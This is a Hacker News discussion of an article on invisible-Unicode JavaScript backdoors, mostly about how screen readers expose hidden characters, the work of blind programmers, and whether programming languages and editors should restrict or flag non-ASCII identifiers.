The Invisible JavaScript Backdoor

gostsamo · on Nov 10, 2021

The benefit of being blind: the screen reader announces invisible characters and I could detect the invisible variable.

mwcampbell · on Nov 10, 2021

The next time someone tries to tell me that a true screen reader should use computer vision and machine learning (including OCR) rather than requiring applications to implement accessibility APIs, I will bring up this case.

SilasX · on Nov 10, 2021

HN exchange:

"Why can't we just, you know, direct blind users to a special protocol that structures the data appropriately and then lets them parse it however they want?"

Me: 'We did! It's called HTML! Designers just broke it!'

https://news.ycombinator.com/item?id=20224961

mwcampbell · on Nov 10, 2021

IMO, HTML is still closer to that ideal than anything else we have. My guess is that given a random web application and a random non-web GUI (especially if the latter is multi-platform), the web application will be more usable with a screen reader.

slaymaker1907 · on Nov 10, 2021

I'd say markdown is even better than HTML for writing generic documents since it enforces simplicity. In particular, it forces a linear flow of the document and does not have any support for stuff like JS.

joquarky · on Nov 10, 2021

And now many people are excited about throwing all of that away with canvas and web assembly.

mmis1000 · on Nov 11, 2021

Is it possible for developer to make canvas accessible? For example, pronounce "You are one the road that goes from left to right, there is a shop on your top and a inn on bottom" like mud.

gostsamo · on Nov 11, 2021

Real accessibility is about presenting the same information your other users have. So, instead of you typing the description, let each of the drawn objects have its own description and made them discoverable and navigable. I think that Google were trying to make flutter2 components accessible, but it means starting from ground zero and building the same stuff anew.

skyde · on Nov 10, 2021

right! But we would not need to use canvas if updating the DOM was not super slow.

I suspect the #1 reason is the layout/reflow engine but i might be wrong. Game engine do run physics at 60fps which is harder than CSS reflow.

HeavyStorm · on Nov 10, 2021

Html could have been that - or better, it was at first - but instead of creating a more specialized solution for running rich apps we decided to exploit html.

Right now we are in what I'd call the worse of both worlds, because we rely on html to do things it wasn't designed to, and there's no longer purity in any html out in the wild.

gostsamo · on Nov 10, 2021

Yep, together with the ml screen reading, they do not offer subsidized infinite battery life and machine learning hardware for the inferring model.

IceWreck · on Nov 10, 2021

How hard is it to program while being blind ? What sort of development do you do ? i understand that frontend is impossible but what other difficulties do you face ?

Are indent based langauges like python harder than bracket based languages ?

gostsamo · on Nov 10, 2021

Hi,

Front end is not entirely impossible, but impossible on doing pixel perfect designs. Otherwise, I know blind people who do FE, not sure if most of it is professional though.

Indent based languages are actually easier. Every screen reader has a way to announce indentation in code, while brackets could be confusing if not formatted or verbose if properly announced.

My main issues are dev tools with bad accessibility. Also, it takes me more time to get acquainted with new code and sometimes omophones in the source code which require extra attention. Filtering through logs is also a bitch in most cases. Besides the dev tools, you can summarize the rest as bad IO speed.

akavel · on Nov 10, 2021

Do you have some tricks for how you handle filtering through logs? Or some ideas if there could be a tool that could help you or mitigate your most critical issue[s]?

I found filtering through longs a major pain even for a fully sighted person like me, so I wrote a tool to help me with that, but it's fully in a "TUI" paradigm (i.e. curses-like), so I presume it wouldn't help you much (https://github.com/akavel/up). No promises, given that the tool as is scratched my itch, but I am honestly curious if something similar could reduce your PITA, including whether this specific tool could be made useful for you through some minimal effort on my side.

gostsamo · on Nov 10, 2021

Hi,

usually grep saves the day. I will check your tool, but what I need is for a terminal command that can recognize the meta fields from a log record and put them on a line separated from the main message. Also, it must be installed everywhere I work, which is not so easy. Putting logs in a table with filtering capabilities might be best, but this means web access to the location of the logs which is again tricky.

akavel · on Nov 11, 2021

The idea of my tool is not really to help in some specific way of processing logs, but rather to make it easier to fiddle with grep and other Linux CLI filtering tools, by shortening the feedback loop vs. normal shell REPL. I'm not sure if that sounds in any way clear; also, it might sound strange that shell REPL is IMO too slow, or that it is in any way important, but I found it enough so that I invented a way to speed it up, and it seemed to hit a nerve of quite many people, seeing from the reception the tool got. I can try to explain more if you are interested and/or don't really understand what I might be even talking about. I tried to explain it in the readme, but for many reasons I have no slightest freaking idea to what extent it might sound understandable to you - not the least due to the fact, that for fully-sighted people one important way I tried to convey the idea is through an animated gif of a terminal window showing how the tool is used. As someone said, with really innovative ideas, it's often necessary to push them down people's throats to make them understand those; this gif is part of that effort, and fortunately seems quite effective, but even it is not enough for some people, and I'm by default assuming that it's for obvious reasons completely inaccessible to you. I was pondering just now whether trying to copy this animation to asciinema could make it in any way more accessible to you, but as of now I have high doubts if that would work at all (including that I have no idea whether the asciinema site is at all accessible to you, as well as that I'm highly suspicious the terminal ANSI sequences generated by a library I'm using are "tiniest diffs", so although the result might look indistinguishable to fully-sighted people, a screen reader might [or might not???] take them at face value and read them as a mess of random jumps and single-character changes on the screen). That said, I'm more than 100% happy if you managed to understand what the tool is doing, and just don't think it could be useful to you, whether as is or with some accessibility improvement attempts. Or if you don't understand but don't feel like wanting to dive deeper either.

ryanianian · on Nov 10, 2021

> what I need is for a terminal command that can recognize the meta fields from a log record and put them on a line separated from the main message

Isn't this the exact use-case of structured logging?

Log events have

    {timestamp, log level, log category, string message, ...arbitrary key/value pairs}

Usually serializing each message as a single json line in a file.

Since it's all on one line you can still use grep, but then since it's machine-readable you can pipe the grep to anything that can parse json. Vanilla python3 works and tends to be a part of most ops toolkits. Such tooling can split out the fields onto other lines etc or in a more reader-friendly format.

gostsamo · on Nov 10, 2021

Yes, this has been my idea in many cases, but it is not always that I have a say over the logging format.

MathCodeLove · on Nov 10, 2021

I've been struggling with eye strain and have considered trying to approach development in a fashion similar to that takeb by blind devs. Any suggestions for guides or overviews for how I can get setup?

gostsamo · on Nov 10, 2021

Hi,

it depends on what you are working on and what you want to do. Generally, screen readers are not as good for programing as they are for plain text stuff, so they will be a limited substitute for whatever you are using now. If you are okay with working slower, they can help you listen through code and tool's messages providing relief for your eyes.

If you are using Windows, NVDA is the screen reader. Jaws is a bit too expensive for my taste without any significant edge over NVDA. The builtin narrator is still immature in my opinion. VSCode has excellent accessibility with a dedicated and involved team. Visual Studio also has extremely good accessibility support though I'm not using it. InteliJ sucks. Not completely, but enough that people do not see the benefit of using it. Eclipse is not popular these days, but it has good accessibility as well as far as I know. Sublime is not accessible.

If you are on Linux, the screen reader is Orca. It does not have the same level of support as the Windows stuff, but I know people who are developing on linux boxes so it is doable. Emacs must be good enough because it has self-voicing plugin and people who like and use it. As far as I know, VSCode for Linux has some accessibility features but I don't know how they compare to Windows.

If you are on Mac, your only choice is Voice Over by Apple as screen reader. It is good but not always perfect to my knowledge. I know people who use TextMaid, XCode, VSCode, and Emacs, but I don't have much feedback from there. It is totally doable though.

On Windows, I'm also using notepad++ as secondary editor because it is faster and works better for large files. Also, it is a good notetaking tool.

We can connect offline if you need some more info.

mrlemke · on Nov 10, 2021

I am very interested in how blind developers work. I have been pondering how to make computers and development more accessible. If you don't mind:

Do you have preference between CLI, TUI, or GUI dev tools?

Is highly symbolic code harder to understand using a screen reader than plain language code? By symbolic, I specifically mean any characters that are not alphanumeric.

gostsamo · on Nov 10, 2021

Hi,

I don't have preferences on the interface. As far as it is accessible, I can learn to work with it. E.g. VSCode make everything possible to make their interface accessible and they are continuously fixing any reported issues.

When it comes to code, verbose is better. Abbreviations take effort to decode. I can remap some symbols to have different pronunciations, but it does not work always. E.g. I've maid the sr to speak the ":=" operator in python as "assigned from", but brackets have nesting and orientation, and too many of them get nasty to listen to or follow.

exikyut · on Nov 11, 2021

It would be really cool to be able to hook into where words started and ended. Then you could add a background tone/frequency rising in pitch with indentation level (and maybe have no tone for the root level).

Oh, if only speech engines broke down the utterance process and made it more open...

gostsamo · on Nov 11, 2021

Hi,

Indentation level is a solved problem and start and end of words is also a customable behavior. Speech engines as a whole are open to customizations. There are some problems though that are just not easy to solve at all. It is like with the regular expressions and html. Hooking the SR to the language server might be an avenue of possible improvements, but the problem definition on my side is currently too vague to formulate correctly.

exikyut · on Nov 12, 2021

Thanks for the reply!

I've just realized I assumed speech-to-text and text-to-speech were similarly complex and unincentivized toward open development. (I wanted to play around with augmenting speech-to-text for some time.) TIL.

So how is indentation level typically handled?

And what other types of customizations are typically leveraged from an output-device standpoint? (Maybe there's a reference I can google for?)

Comparing the problem space to regular expressions and HTML immediately makes sense, that's a very intuitive way of putting it.

I can relate to being completely stumped about how to replace missing functionality with software, in my case organizing information (which is impaired because of autism). What does the problem space around the text-to-speech vaguery look like?

gostsamo · on Nov 12, 2021

Screen readers have the benefit that they have two parts. One of them is the "explorer" so to call it and the other one is a synthesizer. The explorer hooks to the accessibility services and apis of the host system and produces a text representation of the objects discovered. The synthesizer receives the text representations and maps them to sound output.

The easiest way of customization is to get between those two parts and to convert the representation through some rules, regex for example. That's how my rule with the ":=" operator works.

Indentation could be done either through announcing the number of spaces/tabs in the start of the line, or by defining how many of a symbol a level are and assigning a sound to each level that is played when the level changes. There is an option for doing both.

Screen readers have apis for extensions or scripts for more complex functionality. You can check those of Jaws and NVDA for examples. The apis are rather extensive and they allow for lots of customizations like improving support for a given program or general modification of the sr behavior.

exikyut · on Nov 12, 2021

I see, TIL. Thanks for the explanation.

I was thinking/imagining more along the lines of being able to drill down into phoneme pronunciation, adding micro-pauses to or pitch-bending certain syllables based on rules, for example, or having a firehose of machine readable annotations for a given utterance, including indications of the exact start and end times/samples of individual phonemes in the audio stream so you can then mix your own audio track that has additional augmentations in it into the final output, for example using your own synthesizer to modulate tones in the background representing the current indentation level. Yes, ridiculously complex; but by front-loading that complexity (and winning the data accessibility fights) it would be possible to do a lot of cool stuff...

I understand some people swear by JAWS as the generally best-in-class solution, which has admittedly put me off NVDA as I feel I'd sort of absorb a sort of biased sense of what's possible or how audio output software works in general. I guess I should just install NVDA already since it's the realistic option - if I started testing stuff in JAWS and talking about it the only reasonable assumption people would be able to make was that I was using a copy that had drifted ashore from the high seas, which would be kind of true...

gostsamo · on Nov 12, 2021

Depending on what synthesizer you use, you might be able to get in its internals. Keep in mind that each screen readers can use different synthesizers so that both JAWS and NVDA might use e-speak, windows core voices or something totally different.

In regard to the idea that Jaws is best in class, I'm inclined to disagree. Jaws might be a bit better in MS Office applications and UIA support, I haven't used it for years. However, NVDA has the better web story and until recently it was the screen reader that was actually working with VS Code.

exikyut · on Nov 12, 2021

I see, I'll have to have a deeper look. (I'm on Linux, so I think my options are espeak and possibly Festival.)

Thanks very much for the perspective on NVDA. I'll definitely have to give it a go! I've been interested specifically in Web accessibility for quite a while.

mrlemke · on Nov 10, 2021

Thanks for answering. What is your favorite programming language to work in? If you could use any language you wanted, what would be your top pick?

gostsamo · on Nov 10, 2021

Well, this is highly subjective. I'm paid to do python and node js from time to time and python really rocks for me. Not a small reason why I like python more is for the much better tracebacks. When looked in a console, it is much more pleasant to have the erroring line at the bottom which spares me copying the entire console in npp in trying to find the top of it.

That said, I know many blind devs who do java, c#, swift, c++ and so on. I had bad experiences with ide-s when I was starting to study software development on those languages and it've stayed with me, but it is not universal.

If I had the choice, I would not drop python, but I might add some of the functional languages or rust for the new ways of thinking they might teach me. So far, I've looked at them, but I haven't done nothing serious there.

mrlemke · on Nov 10, 2021

Interesting, thanks for sharing!

IceWreck · on Nov 10, 2021

Hey, thats cool. Thank you.

threatripper · on Nov 10, 2021

So, it's a backdoor that only the blind can see?

alphafredo · on Nov 10, 2021

T￸h￸￸i￸￸￸s c￸o￸￸m￸￸￸m￸￸￸￸e￸￸￸￸￸n￸￸￸￸￸￸t s￸h￸￸o￸￸￸u￸￸￸￸l￸￸￸￸￸d￸￸￸￸￸￸n￸￸￸￸￸￸￸'￸￸￸￸￸￸￸￸t b￸e e￸a￸￸s￸￸￸y t￸o r￸e￸￸a￸￸￸d b￸y s￸c￸￸r￸￸￸e￸￸￸￸e￸￸￸￸￸n r￸e￸￸a￸￸￸d￸￸￸￸e￸￸￸￸￸r￸￸￸￸￸￸s

mwcampbell · on Nov 10, 2021

With NVDA on Windows, when I read the comment normally, it's spelled out. When I read it character by character, I get "symbol FFF8" for each of the hidden Unicode characters. And when I move line by line through NVDA's linear representation of the web page, the hidden characters count against the length of the line for the purpose of word wrapping.

Narrator's behavior is weirder. If I turn on scan mode and move onto the line with the up or down arrow key, Narrator says nothing. If I read the current line with Insert+Up Arrow, Narrator spells it out like NVDA does. When moving character by character, Narrator says nothing for the hidden Unicode characters. And because Narrator doesn't do its own line wrapping but defers to the application to determine what counts as a line, the text only counts as one line.

Disclosure: I used to work on the Windows accessibility team at Microsoft, on Narrator among other things.

geocar · on Nov 10, 2021

It is difficult to see on an iPhone, but it sounds fine in Voiceover.

gostsamo · on Nov 10, 2021

yep, it is not.

WesolyKubeczek · on Nov 10, 2021

The benefit of being sighted is being able to use accessibility features while also being sighted.

Take a peek at those technologies sometimes, those things improve work comfort for everyone.

mwcampbell · on Nov 10, 2021

Still, it would not occur to most sighted programmers to review code using a screen reader. To me, this is another argument for having a truly diverse team (or community, in the case of an open-source project); a blind programmer who's already involved with the project would catch something like this. So in this particular case, blindness is truly not a disability.

marginalia_nu · on Nov 10, 2021

Being able to perceive BOM markers is tantamount to a superpower in programming.

josteink · on Nov 10, 2021

Listen guys, don't get me wrong. As someone with Ø in my name, and both Å and Ø in my address, don't get me started on poorly written systems which cannot handle unicode properly. I've seen my name and address mangled in shipping forms, in airline tickets (every time) and even in my marriage-papers since I married abroad.

I literally have personal reasons for getting everyone, and I mean everyone, on the unicode bandwagon.

That said... Maybe it's because I'm a child of the late 70s and early 80s and learned to program on computers which simply didn't have non-ASCII characters at all...

But can't we all just sit down and admit that allowing non-ASCII characters in programming-language identifiers was a bad idea? Can't we in the next revision of EcmaScript (or Rust, or whatever) mandate ASCII-only identifiers when in strict mode or using modules or whatever? Having invisible characters represent executable code is not just a dumb a idea, it's so hazardous that you might call it borderline malicious.

There has to be some way to undo this damage, without breaking compatibility with the code which is already out there, right?

badsectoracula · on Nov 10, 2021

You can only type ~27% of my name with just ASCII (and even then one letter will not be exactly)... and i agree with you. If anything i'd go a bit further and say that, sure, use Unicode in places where you can find arbitrary text like documents, messages, etc but anything that has to do with the 'guts' of the computer should stay away from Unicode (or at least treat it as data, like how filenames are treated on Linux).

I disagree with the getting everyone on the Unicode bandwagon though, IMO Unicode has introduced a ton of problems exactly because it tries to be a ton of stuff at the same time. I don't know how exactly a better solution would be but i have a very hard time accepting that such a convoluted and error prone system is the best solution. IMO if decades later there are still issues with getting it right then there is something fundamentally wrong with the system itself and not with the applications and developers trying to work with it.

gpderetta · on Nov 10, 2021

An existing working solution, even if not perfect, patched, with lot of baggage and technical debt is infinitely better than a non-yet invented ideal, perfect solution.

And even if the perfect solution existed right now, in a few decades it will be as filed with baggage as the current one.

Sometime one has to realize that hard problems are hard.

badsectoracula · on Nov 11, 2021

> Sometime one has to realize that hard problems are hard.

And trying to have a single thing solve everything doesn't help at all. When a problem is hard you try to break it into subproblems.

Unicode simply tries to do a lot of things at once.

Dagonfly · on Nov 10, 2021

Adding a variable decorator/annotation like @Unicode(german,french) would be a good stop-gap. You could only use ASCII characters unless you specified the script that you want to use. One could even set a max limit on how many scripts per variable. Because while I have used German characters in variables before (only if I'm referring to some law or spec), I never had a use case for more than 2 scripts within one variable.

est31 · on Nov 10, 2021

The multiple scripts per variable thing is implemented in Rust via a lint. For the explicit enabling of single scripts, I have suggested that for Rust, but sadly people preferred allowing all identifiers (while giving an option to only have ascii but I'd argue this is unfair for anyone who only wants to use a specific non-ascii language, why do they have to suddenly allow all languages in their code base?). There are also practical concerns, like who says what a language is, which characters it contains, how that language is called, etc? Someone has to maintain all these lists.

chrismorgan · on Nov 10, 2021

> who says what a language is, which characters it contains, how that language is called, etc?

The Unicode Consortium already maintains all of that data in the CLDR (Common Locale Data Registry).

lifthrasiir · on Nov 10, 2021

For your information the relevant Unicode specification is the Script_Extensions property [1]. (You can't easily filter by languages, so you should filter by scripts.)

[1] https://www.unicode.org/reports/tr24/tr24-32.html#Script_Ext...

silvestrov · on Nov 10, 2021

I think this is a good idea because once in a while you need to write non-ascii characters in names.

This mostly comes up when implementing tax rules or government administrative divisions as some countries have names/concepts which have no good translation into English, so you are left with using the non-English name, which often contains non-ASCII characters.

jillesvangurp · on Nov 10, 2021

The issue with this is less that this is possible and more that a lot of javascript ends up in production without ever getting compiled, linted, type-checked, etc. Stuff like this is designed to bypass what little human oversight there is to prevent bad things from happening. What is actually visible also depends on what fonts you have installed on your system. So, it's less clear cut than you think.

The problem is not so much that humans can't see this but that they are not looking very hard to begin with (otherwise, they'd be using the appropriate tools) and that we should rely less on them actively looking. Blind trust that things will be fine is the root problem here.

josteink · on Nov 10, 2021

> The problem is not so much that humans can't see this but that they are not looking very hard to begin with (otherwise, they'd be using the appropriate tools) and that we should rely less on them actively looking.

And simply not allowing non-ASCII identifiers in the first place would be a move in that direction. Now you have one thing less to look for.

lifthrasiir · on Nov 10, 2021

> But can't we all just sit down and admit that allowing non-ASCII characters in programming-language identifiers was a bad idea?

It's a bad idea only if all members in your team can easily produce and comprehend an ASCII-only code.

> Having invisible characters represent executable code is not just a dumb a idea, it's so hazardous that you might call it borderline malicious.

Not if those invisible characters do affect the rendering. Invisible formatting characters like ZWJ and ZWNJ are allowed because they are used in some scripts. The relevant Unicode specification [1] even provides a guideline to limit ZWJ and ZWNJ strictly to the context where they do affect the rendering.

That said, the Hangul filler and half-width Hangul filler were mistakes. They are purely legacy characters and never have been used in practice, so I encourage new languages to exclude them from the default (X)ID_Start/Continue set (Unicode can't do that because of the compatibility, maybe they can introduce another pair of properties without those characters).

[1] https://unicode.org/reports/tr31/#Layout_and_Format_Control_...

josteink · on Nov 10, 2021

> The relevant Unicode specification [1] even provides a guideline to limit ZWJ and ZWNJ strictly to the context where they do affect the rendering.

Which is exactly what I am suggesting by saying non-ASCII characters should be banned from being used as identifiers, not from being present in the code-file all together or in the form of strings, etc.

If the formatting of your output in your applications (as seen by the user) depends on the names you've declared your variables with, then you are doing something horribly wrong.

lifthrasiir · on Nov 10, 2021

You seem to think those formatting characters as something that should be in the higher-level protocol like HTML. They are not. They are used when two consecutive abstract characters can be combined in two or more different ways. And those different renderings frequently have different meanings. That's why they can't be simply removed when normalized; doing so will destroy the text.

josteink · on Nov 10, 2021

We seem to be talking past one another. What Id like to see banned is non-ascii in identifiers, variables-names and nothing else.

While you respond as if I want to banish anything non-ASCII from all parts of all code-files except from HTML-templates. That’s certainly not what I’m advocating.

The following is IMO perfectly fine:

    var greeting = “Hello  (cowboy emoji)”;

The following is IMO not:

    var (emoji) = “Let’s party!”; // note identifier contains non-ascii

Do you still disagree? If so, can you outline why?

lifthrasiir · on Nov 10, 2021

Okay, I think I see where you got confused. There are multiple levels of Unicode identifier support and you are probably not aware of all possible levels. Those levels are:

1. Identifiers can contain any octet with the highest bit set. Different octet sequences denote different names.

2. Identifiers can contain any Unicode code point (or scalar value, the fine distinction is not required here) above U+007F. Different (but possibly same-looking) code point sequences denote different names.

3. Identifiers can contain any Unicode code point in a predefined set, or two if the first character and subsequent characters are distinguished. Different code point sequences denote different names.

4. Same to 3, but these predefined sets derive from the Unicode Identifier and Pattern Syntax specification [1]---namely (X)ID_Start/Continue.

5. Same to 4, but now identifiers are normalized according to one of the Unicode normalization algorithms. So some different code point sequences now map to the same name, but only if they are semantically same according to Unicode.

6. Same to 5, but also has a rule to reduce unwanted identifiers. This may include confusable characters, virtually indistinguishable names and names with multiple unrelated scripts. Unicode itself provides many guidelines in the Unicode Security Mechanisms standard [2].

Levels 3, 4 and 5 are most common choices in programming languages. In particular emojis are not allowed for 4, so your example wouldn't work in such languages. For example JavaScript is one of them so `eval('var \u{1f600} = 42')` doesn't work (where U+1F600 is a smiling face). Both Python and Rust are at the level 5. Possibly unexpectedly, both C and C++ are at the level 3. Levels 1 and 2 are rare especially in modern languages; PHP is a famous example of the level 1.

Level 6 is a complex topic and there are varying degrees of implementations (for example Rust partially supports the level 6 via lints), but there is a notable example outside of programming languages: the Internationalized Domain Names. They have very strong constraints because any pair of confusable labels is a security problem. It seems that they have been successful in keeping the security of non-ASCII domains on par with ASCII-only domains, that is, not fully satisfactory but reasonable enough. (If you don't see the security issues of ASCII-only domains, PaypaI and rnastercard are examples of problematic ASCII labels that were never forbidden.)

I argue that the level 3+ is necessary and the level 5+ is desirable for international audiences. The level 5 would for example mean that `var 안녕하세요 = "annyonghaseyo";` (Korean) is allowed but `var (emoji) = "oh no";` is forbidden. I have outlined why the former is required in the last paragraph of [3]. Does my clarified stance make sense to you?

[1] https://unicode.org/reports/tr31/

[2] https://unicode.org/reports/tr39/

[3] https://news.ycombinator.com/item?id=29170954

josteink · on Nov 10, 2021

To be clear I’m completely oblivious to what Unicode identifiers are. As such I’m not talking about them, and they are out of scope wrt to my point.

What I am advocating is that identifiers used for symbols in the programming language (variables-names, function-names, class-names, etc), should be strictly ASCII-based.

That’s simple, understandable and should be a sane default anywhere.

My opinion is that since nobody without a doctorate in Unicode actually fully understands Unicode, having a rule-set for identifiers built on top of the already bewildering Unicode rule-set is a sure-fire way to engineer for unexpected consequences and/or security issues.

Sure. Allow it if you must. But you must opt in to use it. It should be a non-default feature everywhere where it’s available.

lifthrasiir · on Nov 10, 2021

> That’s simple, understandable and should be a sane default anywhere.

This is an usual canned reason given to reject any internationalization efforts, and it is likely only "simple, understandable" and "a sane default anywhere" to people like you. As you didn't give why they are simple, understandable in general, I don't see how your arguments are universally applicable.

> My opinion is that since nobody without a doctorate in Unicode actually fully understands Unicode, having a rule-set for identifiers built on top of the already bewildering Unicode rule-set is a sure-fire way to engineer for unexpected consequences and/or security issues.

That can be said for about all security issues, not just Unicode. That doesn't make you to avoid writing anything, does it? For the record, it is a valid choice to not write anything, but we normally exclude that choice when we are talking about the technology. And the "bewildering Unicode rule-set" is an one-off thing, as it is not like that Unicode produces incompatible standards every year. (Python 3 adopted Unicode identifiers 14 years ago [1] and implementations never changed, only underlying databases have been updated.)

[1] https://www.python.org/dev/peps/pep-3131/

rtoway · on Nov 10, 2021

Rust has a lint against this kind of attack + you can explicitly disable non-ASCII identifiers if you really want to

est31 · on Nov 10, 2021

Ideally that lint would be on by default though. Most code doesn't use non-ASCII identifiers. It's not happened though because of uhm. political reasons.

drran · on Nov 10, 2021

Most code made by English speakers contains English word and Latin characters, so other languages and alphabets must be abandoned, and their native speakers must imprisoned until they understand their mistakes.

drran · on Nov 10, 2021

OK, OK, we can start with a warning in the compiler that use of any language except English is unsafe.

toastal · on Nov 10, 2021

Abugidas and logographies banished

rtoway · on Nov 10, 2021

The lint is on by default in the latest version of the compiler

auggierose · on Nov 10, 2021

Yeah, let's just switch to Cosmopolitan Identifiers: https://obua.com/publications/cosmo-id/3/ :-)

But yeah, it would break existing code, sorry.

AzzieElbab · on Nov 10, 2021

a lot of software used in shipping/logistics predates unicode

nosianu · on Nov 10, 2021

First thing I did when I first read the story was check my editor. I already had the "Zero Width Characters locator" plugin installed, but that covered less than a handful of specific space character type codes.

Still, the result was good: Looks like IDEA editors like Webstorm show invisible characters with colored background and a warning.

My test was from that first article and also now from this one copy the example code they contained or linked to from the browser into an open file.

Screenshot: https://i.imgur.com/ColuRNB.png

dotancohen · on Nov 10, 2021

Interesting. PhpStorm highlights the variable after `timeout` but does not highlight the variable after `http://example.com/`. Even pressing F2 to go to the next error goes to the first variable (the highlighted one) but not the second.

However, placing the cursor on either does highlight the second.

I'm using the Darcula scheme. Your screenshot obscures the second occurrence, so we cannot see if your light theme has the same issue with the second occurrence not being highlighted as Darcula has.

Screenshot: https://i.imgur.com/FxwUkVz.png

nosianu · on Nov 10, 2021

You are right, I missed the other one, it is not reported. You can see there is something because it takes space, but you have to deliberately go there to see it. There also is no warning from having the "No trailing spaces" setting active, so it is not seen as a space character even if it shows as such.

I'll write an Issue on youtrack, I'm sure they'll fix it. From the well over hundred issues I ever reported about 2/3rd were fixed (rest is obsolete, only a few that are really still open).

EDIT: Bug report submitted.

dotancohen · on Nov 10, 2021

Please link it, I'll comment as well.

Yes, I file bug reports with lots of places, and Jetbrains is one of the best for actually doing something with them. It is one of the few non-FOSS applications that I am willing to integrate into my workflow (hmm, the only one I think).

nosianu · on Nov 10, 2021

Ticket: IDEA-282266 Not all invisible characters are reported

I didn't want to link because of loss of anonymity... :(

https://youtrack.jetbrains.com/issue/IDEA-282266

nosianu · on Nov 10, 2021

EDIT (new comment because edit-period is long gone):

It's not too severe an issue, maybe not one at all(?), at least in this concrete example, because after removing the first occurrence of the hidden variable it now becomes a "not defined" real error and not just a warning in the second location.

tdrdt · on Nov 10, 2021

Some time ago I managed to add a non width character in my PHP code. Because it had no width PhpStorm did not highlight it and I had absolutely no clue why there was an error in my code. So it only highlights when it has width.

Edit: just added some non-space characters and at least in Rider they are now displayed as a warning. So I think this is fixed now.

nosianu · on Nov 11, 2021

I mentioned the zero-width character locator plugin. Did you try that?

JeremyNT · on Nov 10, 2021

While not as fancy, font choice may save you here too. I use vim and while the editor doesn't treat this character as special, my font (Iosevka term) doesn't include this character, and so it's rendered as the generic "missing unicode" glyph with the code inside it.

kingcharles · on Nov 10, 2021

Is there a plugin for detecting homoglyphs like these genderless vs. male zombies I made: https://kingcharles.one/unistrange.html

Klaster_1 · on Nov 10, 2021

A similar thing to the Reddit post mentioned in the article happened to me too: I used a not-a-space character that looks like a space once, the text editor autocompletion remembered it and would occasionally substitute it for space. The code looked OK, but compilation failed or threw syntax errors in run time. This continued for several years until I completely reinstalled the editor, with full cleanup.

yepthatsreality · on Nov 10, 2021

Glances at Microsoft GitHub Copilot.

Enginerrrd · on Nov 10, 2021

Oh my God. That's nightmare level error-inducing.

Arrath · on Nov 10, 2021

Auto-complete gremlins can be the absolute worst, I would have been tearing my hair out.

bavell · on Nov 10, 2021

Dev nightmare fuel

lifthrasiir · on Nov 10, 2021

Hey, you have missed U+FFA0 HALFWIDTH HANGUL FILLER which has about the same property as U+3164 HANGUL FILLER!

Surely I expected this coming ever since I've seen the purported Trojan "attack", as the Hangul fillers are pretty much the only characters that are (X)ID_Start and have no visible glyphs [1]. If (X)ID_Continue is also considered ZWJ and ZWNJ would be another contenders. Attacks using those characters have much better chance than the Trojan "attack", but you need a very specific code to execute the attack. It should be obvious that a typical coding convention easily prevents them.

As much like the purported Trojan "attack", this kind of attacks need a better code review and tooling. You don't need to remove non-ASCII identifiers from existing languages: they have their uses when an entirety of your team speak languages not using Latin script. But you should be able to catch a new use of non-ASCII characters throughout your code base and compare that with your expectation.

[1] The Hangul filler comes from a legacy mechanism of KS X 1001 for unencoded Hangul syllables (it had only 2,350 out of 11,172 modern syllables). The half-width Hangul filler probably comes from a duplicate encoding of the filler in the IBM code page 933 to ensure round-trip conversion. Both are never used in practice, except for probably the Hangul filler that was briefly implemented by Mozilla and removed due to the compatibility issue.

jabbany · on Nov 10, 2021

IIRC Rust has some compiler-level defenses against these glyph based attacks (ref: https://twitter.com/skyslasher11/status/1152824207555698688)

Perhaps one could do something similar in JS as well. Like have a config that will make an interpreter fail if it encounters unescaped unicode in variable names. It does not prevent any unicode variable names, but you just have to escape them if the are from some list of "abusable characters".

(At least Chrome seems to be happy with `var \u6D4B\u8BD5 = 1;`)

goldsteinq · on Nov 10, 2021

You can just do `#![forbid(non_ascii_idents)]` in Rust. It'll prevent this kind of attacks completely and you shouldn't need non-ASCII idents anyway.

matheusmoreira · on Nov 10, 2021

> you shouldn't need non-ASCII idents anyway

Yes, we do. People from all over the world write software too. They should be able to use the words they know in code.

Also, it's totally cool to have mathematical symbols in code. λ, for example. Much more readable than the word lambda. The only reason these symbols are hard to type is our keyboards suck. They can be made easy to type with editor support though.

antris · on Nov 10, 2021

>Yes, we do. People from all over the world write software too. They should be able to use the words they know in code

My native language has non-ASCII characters and I do not expect nor do I want to be able to type them outside string literals. Specifically for the reasons stated in the blog post, among others. Writing in my native language is far, far down in the list of priorities as a professional coder, when security / compatibility are there too. Suggesting that non-native English speakers have to be able to code in their native language also would suggest that non-native coders do not take security / compatibility seriously, which would mean that they are unprofessional. I'm pretty sure that it's not your intention to suggest that, but that's kind of how it comes across. With all the problems eliminated by the use of English and ASCII, it would strike me as amateurish to not use English and ASCII wherever possible.

matheusmoreira · on Nov 10, 2021

> non-native coders do not take security / compatibility seriously

That's not what I said at all. I don't see how you came to this conclusion.

> With all the problems eliminated by the use of English and ASCII, it would strike me as amateurish to not use English and ASCII wherever possible.

Not everybody speaks english. I've taught programming to quite a few people and they all attempted to use normal characters while writing code. There's absolutely no reason why that shouldn't work. I don't see how characters like ç or ã or ü could possibly cause security issues. Go ahead and ban the invisible unicode stuff but there's absolutely no reason why these common letters shouldn't work.

antris · on Nov 10, 2021

It is funny that you are using the existence of a segment of the population that I am a part of, to make your claim but aren't willing to listen when a member of the segment is trying to explain how non-ASCII characters and coding do not mix well.

Sure, you could make a fix for this specific case, but the problem mentioned in the blog post is not even close to the only problem of non-ASCII characters. In theory, yes, we could make a language and a full suite of tooling that would play nice with non-ASCII characters. But it's not like the whole non English speaking world is waiting for this to happen. People code in English even in teams where everyone speaks Finnish. Nobody even questions it, because it's so obvious that all code should be in English and ASCII. Everyone has shot their foot, putting in non-ASCII characters in the source code at some point of their career, if they have ever dared to try. That's how the reality is, and at the same time I hear people saying that the existence of those Finnish programmers means we have to have Unicode in source code.

>That's not what I said at all. I don't see how you came to this conclusion.

I didn't say you said it. I said that's how it (probably accidentally) comes across when you talk about something so carelessly. Non English speakers care about compatibility and security and take those seriously, therefore we pretty much always write code in English and ASCII.

matheusmoreira · on Nov 10, 2021

> It is funny that you are using the existence of a segment of the population that I am a part of, to make your claim but aren't willing to listen when a member of the segment is trying to explain how non-ASCII characters and coding do not mix well.

Why is it funny? I'm also a member of that group. English is not my native language.

> But it's not like the whole non English speaking world is waiting for this to happen.

I don't think we should have to wait for this to happen. In many ways, it's already happened: most modern languages already support unicode symbols.

> People code in English even in teams where everyone speaks Finnish. Nobody even questions it, because it's so obvious that all code should be in English and ASCII.

Relatively few people speak english in my country. I have only a few friends who do. A whole team of people writing code in english just doesn't seem likely where I live. I actually tried writing english code in such a context once, the result was a mixed language mess that I quickly reverted back to my native language. Unicode support is great because it makes the non-english code much more readable.

